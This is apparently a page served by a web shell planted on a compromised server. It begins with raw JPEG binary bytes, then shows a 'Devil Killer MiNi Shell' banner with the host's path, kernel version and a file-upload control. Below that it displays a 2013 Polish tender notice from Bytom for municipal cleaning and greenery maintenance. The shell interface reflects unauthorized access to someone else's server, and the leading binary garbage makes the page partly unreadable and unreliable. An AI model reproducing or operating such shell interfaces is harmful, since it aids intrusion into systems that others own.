JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130621/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130621/240248-N-2013.html

<p class="kh_header"><b>Bytom: Realizacja pakietu usług sanitarno - porządkowych i konserwacyjnych na terenie miasta Bytomia</b><br>
<b>Numer ogłoszenia: 240248 - 2013; data zamieszczenia: 21.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Zieleni i Gospodarki Komunalnej , ul. Smolenia 35, 41-902 Bytom, woj. śląskie, tel. 32 39 69 780, faks 32 39 69 780.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Realizacja pakietu usług sanitarno - porządkowych i konserwacyjnych na terenie miasta Bytomia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest realizacja pakietu usług sanitarno - porządkowych                                  i konserwacyjnych na terenie miasta Bytomia:
1) letnie utrzymanie dróg, w tym  dróg krajowych wraz z węzłami, dróg oraz ulic
    wojewódzkich, powiatowych, gminnych i wewnętrznych, obiektów drogowych oraz  
    pieszo jezdni, placów miejskich, parkingów, chodników (w tym schodów terenowych,  
    przystanków komunikacji autobusowej i tramwajowej), alejek, kładek i przejść  
    podziemnych, poboczy oraz terenów przy budynkach mieszkalnych i budowlach,
          2) wykonanie prac związanych z utrzymaniem i konserwacją zieleni miejskiej, 
          3) wykonanie prac związanych z utrzymaniem placów zabaw, fontann, szaletów miejskich   
              i innych elementów małej architektury i obiektów komunalnych.

2.	Pakiet usług objętych zamówieniem jest wypełnieniem obowiązków związanych z utrzymaniem czystości i porządku nałożonych na zamawiającego, zgodnie z przepisami ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach  (tekst jednolity:  Dz. U. z 2012r.  poz. 391 z późn. zm.) 

3.	Przedmiot zamówienia określa szczegółowy opis przedmiotu zamówienia stanowiący załącznik                nr 15 do siwz.
 
4.	Zamówienie podzielone jest na siedem części - siedem Rejonów: 
Rejon I - Centrum
Rejon II - Śródmieście północ
Rejon III - Śródmieście zachód
Rejon IV - Stroszek, Sucha Góra
Rejon V - Miechowice, Stolarzowice
Rejon VI - Karb, Bobrek, Szombierki
Rejon VII - Łagiewniki, Rozbark
.    Wykazy terenów dla poszczególnych Rejonów przedstawiają załączniki  nr 1-7 do 
     szczegółowego opisu przedmiotu zamówienia.
5.    Zamawiający dopuszcza możliwość składania ofert częściowych. 
Wykonawca przystępujący do niniejszego postępowania o udzielenie zamówienia może złożyć ofertę na jedną lub więcej części. 
 Wykonawca składający ofertę na więcej niż jeden Rejon może oświadczenia i dokumenty  
 złożyć w jednym egzemplarzu i dołączyć do formularza ofertowego jednego z Rejonów,  
z wyłączeniem dokumentów, o których mowa w cz.V pkt 2 ppkt 3,4 i 5, które należy złożyć dla każdego z Rejonów oddzielnie. 
Tak złożone oświadczenia i dokumenty będą traktowane jako odnoszące się do każdej części, na którą została złożona oferta..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.00.00-6, 77.31.41.00-5, 77.34.00.00-5, 77.21.14.00-6, 77.21.15.00-7, 50.87.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) Wykonawca winien wykazać, iż posiada aktualne zezwolenie na prowadzenie działalności w zakresie transportu odpadów  wydane na podstawie ustawy z dnia 27 kwietnia 2001r. o odpadach bądź na warunkach ustawy z dnia 14 grudnia 2012 r. o odpadach, obejmujące teren Gminy Bytom zakresie następujących kodów odpadów :
     20 03 01 - niesegregowane (zmieszane) odpady komunalne,
     20 03 03 - odpady z oczyszczania ulic i placów,
     20 02 01 - odpady ulegające biodegradacji.
 
b) Wykonawca winien wykazać, iż posiada decyzję Powiatowego Lekarza Weterynarii zezwalającą na zbieranie i transportowanie ubocznych produktów pochodzenia zwierzęcego kat. 1 wydaną na podstawie ustawy z dn. 11 marca 2004 r. o ochronie zdrowia zwierząt oraz zwalczaniu chorób zakaźnych zwierząt (jt. Dz. U. z 2008 r. Nr 213 poz. 1342 z późn. zm)
4.	Zamawiający oceni spełnienie ww. warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów określonych w cz. V siwz. Dokumenty załączone do oferty weryfikowane będą wg formuły /spełnia-nie spełnia/. Przedłożone dokumenty muszą zawierać potwierdzenie każdego  elementu danego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, iż  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje :
a)co najmniej jedną usługę oczyszczania - w ramach letniego utrzymania - dróg, chodników, alejek, schodów o wartości co najmniej 50 000,00 zł brutto,
b)co najmniej jedną usługę związaną z utrzymaniem i konserwacją zieleni miejskiej urządzonej i/lub zieleni przy budynkach mieszkalnych i budowlach o wartości co najmniej 20.000,00 zł brutto (warunek dotyczy wyłącznie Rejonu II, III, IV, V, VI, VII)
c)co najmniej jedną usługą związaną z pielęgnacją drzew i/lub krzewów o wartości co najmniej 8 000,00 zł brutto,
d)remonty i bieżącą konserwację co najmniej dwóch placów zabaw (warunek dotyczy wyłącznie Rejonu II, III, IV, V, VI, VII)
e)co najmniej jedną usługą związaną z obsługą i utrzymaniem jednego szaletu stacjonarnego (warunek dotyczy wyłącznie Rejonu I i III),
f)co najmniej jedną usługę związaną z obsługą i utrzymaniem jednej fontanny (warunek dotyczy wyłącznie Rejonu I, II, III),
Wykonawca winien przedłożyć dowody, czy powyższe usługi zostały wykonane lub są wykonywane należycie.
Usługi określone powyżej muszą być wykonane/wykonywane w ramach jednej umowy w zakresie danego podpunktu.
W przypadku, gdy wartość dotycząca warunku określonego pod lit. a,b i c wyrażona będzie w walucie obcej, Wykonawca zobowiązany jest przeliczyć tę wartość w oparciu o średni kurs walut NBP dla danej waluty z daty wszczęcia postępowania o udzielenie zamówienia publicznego. Jeżeli w tym dniu nie będzie opublikowany średni kurs NBP,  należy przyjąć kurs średni z ostatniej tabeli przed wszczęciem postępowania.

W przypadku usług wykonywanych Zamawiający uzna spełnienie w/w warunku, jeżeli do dnia wyznaczonego na składanie ofert w w/w okresie nastąpiła realizacja usług na kwotę co najmniej wskazaną w warunku określonym pod lit.a,b i c.
     Wykonawca składając ofertę na więcej niż jeden Rejon może wykazać się odrębnym   
     doświadczeniem na każdym z Rejonów lub może wykazać się tym samym   
     doświadczeniem niemniej jednak winno ono stanowić iloczyn wartości/ilości 
     przypadającej na jeden Rejon i ilości Rejonów, na które składa ofertę.

Zamawiający oceni spełnienie ww. warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów określonych w cz. V siwz. Dokumenty załączone do oferty weryfikowane będą wg formuły /spełnia-nie spełnia/. Przedłożone dokumenty muszą zawierać potwierdzenie każdego  elementu danego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, iż dysponuje lub będzie dysponował niezbędnymi do wykonania zamówienia narzędziami i urządzeniami, tj. co najmniej :
a)jedną ciągnioną zamiatarką mechaniczną ze szczotkami obrotowymi i szczotką walcową do oczyszczania nawierzchni jezdni z załadunkiem urobku na samochód wywrotkę z możliwością zwilżania zamiatanych powierzchni z opcją uniemożliwiającą wtórne zapylenia środowiska - szerokość zamiatania min. 2 700 mm - dotyczy Rejonu I,II,III,IV,V,VI i VII,
b)dwoma zamiatarkami ulicznymi ssącymi lub elewatorowymi, z możliwością zwilżania zamiatanych powierzchni z opcją uniemożliwiającą wtórne zapylenia środowiska - szerokość zamiatania min. 2 300 mm - dotyczy Rejonu I,II,III,IV,V,VI i VII,
c)jedną samojezdną zamiatarką mechaniczną ze szczotkami obrotowymi oraz możliwością zwilżania zamiatanych powierzchni typ lekki , o dopuszczalnej masie całkowitej do 3,5 Mg (T) - dotyczy Rejonu I, II,III,IV,V,VI i VII ,
d)jedną samojezdną zamiatarką mechaniczną ze szczotkami obrotowymi oraz możliwością zwilżania zamiatanych powierzchni typ lekki , o dopuszczalnej masie całkowitej do 2,5 Mg (T) - dotyczy Rejonu I,
e)jedną zamiatarką samobieżną mechaniczno - chodnikową  (walcową) o szerokości zamiatania do 1500 mm - dotyczy Rejonu I,II,III,IV,V,VI i VII,
f)jednym samochodem dostawczym do 3,5 ton ładowności - dotyczy Rejonu I,II,III,IV,V,VI i VII,
g)jednym samochodem samowyładowczym powyżej 3,5 tony ładowności lub ciągnik rolniczy z przyczepą - dotyczy Rejonu I,II,III,IV,V,VI i VII,
h)dwoma odkurzaczami  do zbierania odchodów zwierzęcych - dotyczy Rejonu I,II,III,IV,V,VI i VII,
i)jednym samochodem polewaczką o minimalnej pojemności zbiornika min. 6m3, wyposażonym w pompy, polewaki, listwę zraszającą oraz przyłącza do hydrantu - dotyczy Rejonu I, II,III,IV,V,VI i VII,
j)jednym samochodem polewaczką o minimalnej pojemności zbiornika 2 m3, wyposażonym w pompy, polewaki, listwę zraszającą oraz przyłącza do hydrantu - dotyczy Rejonu I,
k)jednym podnośnikiem montażowym lub Wykonawca winien oświadczyć o wykonywaniu prac metodą alpinistyczną - dotyczy Rejonu I,II,III,IV,V,VI i VII,
l)dwoma kosiarkami samojezdnymi lub ciągnikowymi - dotyczy Rejonu I,
m)trzema  kosiarkami samojezdnymi lub ciągnikowymi - dotyczy Rejonu II,III,IV,V,VI i VII,
n)dwoma kosiarkami mechanicznymi - dotyczy Rejonu I,
o)trzema kosiarkami mechanicznymi - dotyczy Rejonu II,III,IV,V,VI i VII,
p)dwoma piłami spalinowymi - dotyczy Rejonu I,II,III,IV,V,VI i VII,
q)dwoma nożycami spalinowymi do żywopłotu - dotyczy Rejonu I,II,III,IV,V,VI i VII,
r)jedną podkaszarką - dotyczy Rejonu I,II,III,IV,V,VI i VII,
s)jedną myjką ciśnieniową - dotyczy Rejonu I, III,VI i VII.
Zamawiający oceni spełnienie ww. warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów określonych w cz. V siwz. Dokumenty załączone do oferty weryfikowane będą wg formuły /spełnia-nie spełnia/. Przedłożone dokumenty muszą zawierać potwierdzenie każdego  elementu danego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że dysponuje lub będzie dysponował osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w jego wykonywaniu, w szczególności odpowiedzialnych za świadczenie usług, tj. co najmniej:
a)jedną osobą posiadającą uprawnienia SEP kat.E do 1 kW (dotyczy Rejonu I, II, III),
b)jedną osobą przeszkoloną w zakresie bezpieczeństwa urządzeń na placach zabaw i posiadającą dokument potwierdzający fakt przeszkolenia, wydany przez stowarzyszenia branżowe lub Urząd Dozoru Technicznego (dotyczy Rejonu II, III, IV, V, VI, VII)
c)jedną osobą posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności wod.-kan. co najmniej w ograniczonym zakresie lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania których w aktualnym stanie prawnym upoważniają  uprawnienia budowlane w tej specjalności (dotyczy Rejonu I, II, III)
d)jedną osobą - pilarzem drzew ozdobnych (dotyczy Rejonu I, II, III, IV, V, VI, VII).
Zamawiający oceni spełnienie ww. warunków udziału w postępowaniu na podstawie oświadczeń i dokumentów określonych w cz. V siwz. Dokumenty załączone do oferty weryfikowane będą wg formuły /spełnia-nie spełnia/. Przedłożone dokumenty muszą zawierać potwierdzenie każdego  elementu danego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Pod pojęciem głównych usług Zamawiający rozumie usługi polegające na wykonaniu czynności w zakresie niezbędnym do wykazania spełnienia warunku posiadania wiedzy i doświadczenia opisanego powyżej.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)formularza oferty, 
b)oświadczeń i dokumentów określonych w cz. V specyfikacji; 
oraz (jeżeli dotyczy)
c)pełnomocnictwa do działania w imieniu Wykonawcy, jeżeli do reprezentowania Wykonawcy wskazano inną osobę niż upoważnioną z mocy prawa - oryginał lub kopia notarialnie poświadczona za zgodność z oryginałem lub innego dokumentu, z którego wynika upoważnienie do reprezentowania Wykonawcy (vide: pkt 2);
d)dokumentu potwierdzającego ustanowienie pełnomocnika zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych w przypadku, gdy do przetargu przystępują Wykonawcy działający wspólnie - oryginał lub kopia notarialnie poświadczona za zgodność z oryginałem przez Wykonawcę, w przypadku pełnomocnictwa - należy je złożyć w oryginale lub kopii notarialnie poświadczonej za zgodność z oryginałem;
e)dowodu wskazującego, iż zasoby podmiotu trzeciego, na które powołuje się Wykonawca zostaną mu udostępnione do realizacji zamówienia, w szczególności pisemnego zobowiązania innych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia (w przypadku zobowiązania należy przedłożyć oryginał tego dokumentu).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, za wyjątkiem niżej określonych możliwości i warunków dokonania takiej zmiany:
1) zmiany strony umowy - Wykonawcy w sytuacji  następstwa prawnego wynikającego z odrębnych przepisów,
2) Zamawiający przewiduje możliwość dokonania zmiany części wykonywanego przez podwykonawcę zakresu prac, bądź wprowadzenia nowego zakresu,
3) w sytuacjach, których nie można było przewidzieć w chwili zawarcia umowy, a nie powstałych z winy Zamawiającego ani Wykonawcy, Zamawiający dopuszcza możliwość niezrealizowania pełnego zakresu prac;
4) Zamawiający przewiduje możliwość dokonania zmian umowy , w szczególności dotyczących sposobu wykonania-realizacji zamówienia lub jego zakresu, podyktowanych obiektywnymi okolicznościami, których nie można było przewidzieć.  
2. Dokonanie zmiany umowy w zakresie jw. wymaga uprzedniego złożenia na piśmie wniosku Wykonawcy wykazującego zasadność wprowadzenia zmian i zgody Zamawiającego na jej dokonanie lub przedłożenia zmiany przez Zamawiającego. 
3. Jakiekolwiek zmiany umowy pod rygorem nieważności wymagają zachowania formy pisemnej w postaci aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.um.bytom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Zieleni i Gospodarki Komunalnej
ul. Smolenia 35
41-902 Bytom.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.07.2013 godzina 10:00, miejsce: Miejski Zarząd Zieleni i Gospodarki Komunalnej (sekretariat)
ul. Smolenia 35
41-902 Bytom.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
